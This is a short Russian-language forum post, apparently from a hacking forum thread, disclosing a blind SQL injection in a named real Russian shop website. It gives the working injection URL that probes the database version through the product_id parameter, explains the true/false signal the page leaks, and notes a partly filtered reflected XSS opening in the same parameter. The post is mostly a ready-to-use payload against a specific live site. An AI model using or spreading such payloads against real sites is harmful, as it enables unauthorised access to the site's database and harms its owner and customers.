Показать сообщение отдельно

  #248  
Старый 10.02.2017, 04:53
leksadin
Участник форума
Регистрация: 19.01.2016
Сообщений: 121
С нами: 5429846

Репутация: 12
По умолчанию

Blind SQL injection

agroharvest.ru/index.php?route=product/product&path=336_343&product_id=21448' AND substring(VERSION(),1,6)='5.6.32

В случае, когда равенство не выполняется, на сайте пропадают рекомендуемые товары.

Данный параметр 17 раз напрямую попадает в код страницы - можно было бы сделать SiXSS. Но при попытке сразу после угловой скобки () весь остальной текст удаляется.
 
Ответить с цитированием